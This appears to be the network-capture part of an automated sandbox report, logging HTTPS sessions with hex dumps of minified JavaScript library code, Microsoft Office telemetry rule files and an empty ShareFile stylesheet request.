                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC16384INData Raw: 22 2f 22 2b 6e 2e 70 61 74 68 6e 61 6d 65 7d 7d 72 65 74 75 72 6e 20 65 3d 6f 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 72 2e 69 73 53 74 72 69 6e 67 28 74 29 3f 6f 28 74 29 3a 74 3b 72 65 74 75 72 6e 20 6e 2e 70 72 6f 74 6f 63 6f 6c 3d 3d 3d 65 2e 70 72 6f 74 6f 63 6f 6c 26 26 6e 2e 68 6f 73 74 3d 3d 3d 65 2e 68 6f 73 74 7d 7d 28 29 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 30 7d 7d 2c 36 30 31 36 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 34 38 36 37 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 2e 66 6f 72 45 61 63 68 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b
                                                                                                                                                                                                                                                                                Data Ascii: "/"+n.pathname}}return e=o(window.location.href),function(t){var n=r.isString(t)?o(t):t;return n.protocol===e.protocol&&n.host===e.host}}():function(){return!0}},6016:(e,t,n)=>{"use strict";var r=n(4867);e.exports=function(e,t){r.forEach(e,(function(n,r){
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC16384INData Raw: 74 79 53 79 6d 62 6f 6c 73 2c 66 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 2c 6d 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2c 68 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 20 67 28 65 2c 74 2c 6e 29 7b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 29 7b 69 66 28 68 29 7b 76 61 72 20 72 3d 6d 28 74 29 3b 72 26 26 72 21 3d 3d 68 26 26 67 28 65 2c 72 2c 6e 29 7d 76 61 72 20 6f 3d 64 28 74 29 3b 70 26 26 28 6f 3d 6f 2e 63 6f 6e 63 61 74 28 70 28 74 29 29 29 3b 66 6f 72 28 76 61 72 20 61 3d 6c 28 65 29 2c 73 3d 6c 28 74 29 2c 76 3d 30 3b 76 3c 6f 2e 6c 65 6e 67 74 68 3b 2b 2b 76 29 7b 76 61 72 20 5f 3d
                                                                                                                                                                                                                                                                                Data Ascii: tySymbols,f=Object.getOwnPropertyDescriptor,m=Object.getPrototypeOf,h=Object.prototype;e.exports=function g(e,t,n){if("string"!=typeof t){if(h){var r=m(t);r&&r!==h&&g(e,r,n)}var o=d(t);p&&(o=o.concat(p(t)));for(var a=l(e),s=l(t),v=0;v<o.length;++v){var _=
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC16384INData Raw: 29 5d 2c 28 69 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 72 3d 73 29 3f 72 2e 61 70 70 6c 79 28 74 2c 6f 29 3a 72 29 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 7c 7c 28 65 2e 65 78 70 6f 72 74 73 3d 69 29 29 7d 28 30 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6f 3d 72 26 26 72 2e 55 52 49 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 3d 31 3b 69 66 28 21 28 74 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 69 29 29 72 65 74 75 72 6e 20 6e 3f 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 3d 32 3f 6e 65 77 20 69 28 65 2c 74 29 3a 6e 65 77 20 69 28 65 29 3a 6e 65 77 20 69 3b 69 66 28 65 3d 3d 3d 75 6e 64
                                                                                                                                                                                                                                                                                Data Ascii: )],(i="function"==typeof(r=s)?r.apply(t,o):r)===undefined||(e.exports=i))}(0,(function(e,t,n,r){"use strict";var o=r&&r.URI;function i(e,t){var n=arguments.length>=1;if(!(this instanceof i))return n?arguments.length>=2?new i(e,t):new i(e):new i;if(e===und
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC16384INData Raw: 6f 63 6f 6c 5f 65 78 70 72 65 73 73 69 6f 6e 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 50 72 6f 74 6f 63 6f 6c 20 22 27 2b 65 2b 22 5c 22 20 63 6f 6e 74 61 69 6e 73 20 63 68 61 72 61 63 74 65 72 73 20 6f 74 68 65 72 20 74 68 61 6e 20 5b 41 2d 5a 30 2d 39 2e 2b 2d 5d 20 6f 72 20 64 6f 65 73 6e 27 74 20 73 74 61 72 74 20 77 69 74 68 20 5b 41 2d 5a 5d 22 29 3b 72 65 74 75 72 6e 20 78 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 74 29 7d 2c 61 2e 73 63 68 65 6d 65 3d 61 2e 70 72 6f 74 6f 63 6f 6c 2c 61 2e 70 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 70 61 72 74 73 2e 75 72 6e 3f 65 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 22 22 3a 74 68 69 73 3a 28 65 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26
                                                                                                                                                                                                                                                                                Data Ascii: ocol_expression))throw new TypeError('Protocol "'+e+"\" contains characters other than [A-Z0-9.+-] or doesn't start with [A-Z]");return x.call(this,e,t)},a.scheme=a.protocol,a.port=function(e,t){return this._parts.urn?e===undefined?"":this:(e!==undefined&
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC16384INData Raw: 49 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 43 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 76 2e 74 65 73 74 28 65 29 3f 22 78 6e 2d 2d 22 2b 54 28 65 29 3a 65 7d 29 29 7d 2c 74 6f 55 6e 69 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 43 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 67 2e 74 65 73 74 28 65 29 3f 7a 28 65 2e 73 6c 69 63 65 28 34 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3a 65 7d 29 29 7d 7d 2c 28 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 2e 63 61 6c 6c 28 74 2c 6e 2c 74 2c 65 29 29 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 7c 7c 28 65 2e 65 78 70 6f 72 74 73 3d 72 29 7d 28 29 7d 2c 32 34 37 33 3a 65 3d 3e 7b 22 75 73 65 20
                                                                                                                                                                                                                                                                                Data Ascii: I:function(e){return C(e,(function(e){return v.test(e)?"xn--"+T(e):e}))},toUnicode:function(e){return C(e,(function(e){return g.test(e)?z(e.slice(4).toLowerCase()):e}))}},(r=function(){return a}.call(t,n,t,e))===undefined||(e.exports=r)}()},2473:e=>{"use
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC16384INData Raw: 74 6f 72 3d 36 34 5d 3d 22 44 72 6f 70 62 6f 78 43 6f 6e 6e 65 63 74 6f 72 22 2c 65 5b 65 2e 4f 6e 65 44 72 69 76 65 43 6f 6e 6e 65 63 74 6f 72 3d 31 32 38 5d 3d 22 4f 6e 65 44 72 69 76 65 43 6f 6e 6e 65 63 74 6f 72 22 2c 65 5b 65 2e 47 6f 6f 67 6c 65 44 72 69 76 65 43 6f 6e 6e 65 63 74 6f 72 3d 32 35 36 5d 3d 22 47 6f 6f 67 6c 65 44 72 69 76 65 43 6f 6e 6e 65 63 74 6f 72 22 2c 65 5b 65 2e 45 78 63 68 61 6e 67 65 43 6f 6e 6e 65 63 74 6f 72 3d 35 31 32 5d 3d 22 45 78 63 68 61 6e 67 65 43 6f 6e 6e 65 63 74 6f 72 22 2c 65 5b 65 2e 47 65 6e 65 72 69 63 43 6f 6e 6e 65 63 74 6f 72 3d 31 30 32 34 5d 3d 22 47 65 6e 65 72 69 63 43 6f 6e 6e 65 63 74 6f 72 22 2c 65 5b 65 2e 4f 6e 65 44 72 69 76 65 42 75 73 69 6e 65 73 73 43 6f 6e 6e 65 63 74 6f 72 3d 32 30 34 38 5d
                                                                                                                                                                                                                                                                                Data Ascii: tor=64]="DropboxConnector",e[e.OneDriveConnector=128]="OneDriveConnector",e[e.GoogleDriveConnector=256]="GoogleDriveConnector",e[e.ExchangeConnector=512]="ExchangeConnector",e[e.GenericConnector=1024]="GenericConnector",e[e.OneDriveBusinessConnector=2048]
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 3d 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 29 72 65 74 75 72 6e 20 41 72 72 61 79 2e 66 72 6f 6d 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 72 65 28 65 2c 74 29 7b 69 66 28 65 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 20 74 65 28 65 2c 74 29 3b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 73 6c 69 63 65 28 38 2c 2d 31 29 3b 72 65 74 75 72 6e 22 4f 62 6a 65 63 74 22 3d 3d 3d 6e 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 28 6e 3d 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 29 2c 22 4d 61 70 22 3d 3d 3d 6e 7c 7c 22 53 65 74 22 3d 3d 3d 6e 3f 41 72 72 61 79 2e 66 72 6f 6d 28 65 29 3a 22 41 72 67 75 6d 65 6e 74 73 22 3d
                                                                                                                                                                                                                                                                                Data Ascii: =e["@@iterator"])return Array.from(e)}function re(e,t){if(e){if("string"==typeof e)return te(e,t);var n=Object.prototype.toString.call(e).slice(8,-1);return"Object"===n&&e.constructor&&(n=e.constructor.name),"Map"===n||"Set"===n?Array.from(e):"Arguments"=
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 66 28 65 2e 69 6e 64 65 78 4f 66 28 22 57 65 62 6b 69 74 22 29 3e 2d 31 29 72 65 74 75 72 6e 20 75 3b 76 61 72 20 64 3d 63 2e 73 70 6c 69 74 28 2f 2c 28 3f 21 5b 5e 28 29 5d 2a 28 3f 3a 5c 28 5b 5e 28 29 5d 2a 5c 29 29 3f 5c 29 29 2f 67 29 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 2f 2d 77 65 62 6b 69 74 2d 7c 2d 6d 73 2d 2f 2e 74 65 73 74 28 65 29 7d 29 29 2e 6a 6f 69 6e 28 22 2c 22 29 3b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 22 4d 6f 7a 22 29 3e 2d 31 3f 64 3a 28 69 5b 22 57 65 62 6b 69 74 22 2b 28 30 2c 6f 5b 22 64 65 66 61 75 6c 74 22 5d 29 28 65 29 5d 3d 75 2c 69 5b 22 4d 6f 7a 22 2b 28 30 2c 6f 5b 22 64 65 66 61 75 6c 74 22 5d 29 28 65 29 5d 3d 64 2c 63 29 7d 7d 3b 76 61 72 20 6e 3d 69 28 77 74
                                                                                                                                                                                                                                                                                Data Ascii: f(e.indexOf("Webkit")>-1)return u;var d=c.split(/,(?![^()]*(?:\([^()]*\))?\))/g).filter((function(e){return!/-webkit-|-ms-/.test(e)})).join(",");return e.indexOf("Moz")>-1?d:(i["Webkit"+(0,o["default"])(e)]=u,i["Moz"+(0,o["default"])(e)]=d,c)}};var n=i(wt
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 34 36 37 37 3a 63 61 73 65 20 35 35 33 33 3a 63 61 73 65 20 35 37 38 39 3a 63 61 73 65 20 35 30 32 31 3a 63 61 73 65 20 34 37 36 35 3a 69 66 28 67 6e 28 65 29 2d 31 2d 74 3e 36 29 73 77 69 74 63 68 28 6d 6e 28 65 2c 74 2b 31 29 29 7b 63 61 73 65 20 31 30 39 3a 69 66 28 34 35 21 3d 3d 6d 6e 28 65 2c 74 2b 34 29 29 62 72 65 61 6b 3b 63 61 73 65 20 31 30 32 3a 72 65 74 75 72 6e 20 70 6e 28 65 2c 2f 28 2e 2b 3a 29 28 2e 2b 29 2d 28 5b 5e 5d 2b 29 2f 2c 22 24 31 22 2b 57 6e 2b 22 24 32 2d 24 33 24 31 22 2b 55 6e 2b 28 31 30 38 3d 3d 6d 6e 28 65 2c 74 2b 33 29 3f 22 24 33 22 3a 22 24 32 2d 24 33 22 29 29 2b 65 3b 63 61 73 65 20 31 31 35 3a 72 65 74 75 72 6e 7e 66 6e 28 65 2c 22 73 74 72 65 74 63 68 22 29 3f 61 72 28 70 6e 28 65 2c 22 73 74 72 65 74 63 68 22 2c
                                                                                                                                                                                                                                                                                Data Ascii: 4677:case 5533:case 5789:case 5021:case 4765:if(gn(e)-1-t>6)switch(mn(e,t+1)){case 109:if(45!==mn(e,t+4))break;case 102:return pn(e,/(.+:)(.+)-([^]+)/,"$1"+Wn+"$2-$3$1"+Un+(108==mn(e,t+3)?"$3":"$2-$3"))+e;case 115:return~fn(e,"stretch")?ar(pn(e,"stretch",


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                86192.168.2.64981213.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:17 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 477
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                                                x-ms-request-id: aa894e1a-201e-0000-7cf8-19a537000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180517Z-185b7d577bdd97twt8zr6y8zrg00000001e000000000mf45
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                87192.168.2.64981413.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:17 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 494
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                                                x-ms-request-id: 4ad26f23-901e-00ac-1503-1ab69e000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180517Z-185b7d577bdcmhtqq5qad662uw00000001ag000000018ura
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                88192.168.2.64981313.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:17 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 464
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                                                x-ms-request-id: a705c86c-801e-0078-3b70-1abac6000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180517Z-185b7d577bdhgg84qrpnm2d6w0000000015g00000000w7ek
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                89192.168.2.64981513.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:17 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                                                x-ms-request-id: 837be9b2-101e-0046-5ec9-1991b0000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180517Z-185b7d577bd787g6hpze00e34800000000s000000000kxau
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                90192.168.2.64981613.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC579OUTGET /sharefile-web/sharefiledev-integrations-pilet/0.0.175/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Thu, 22 Aug 2024 14:51:30 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 07:37:46 GMT
                                                                                                                                                                                                                                                                                ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
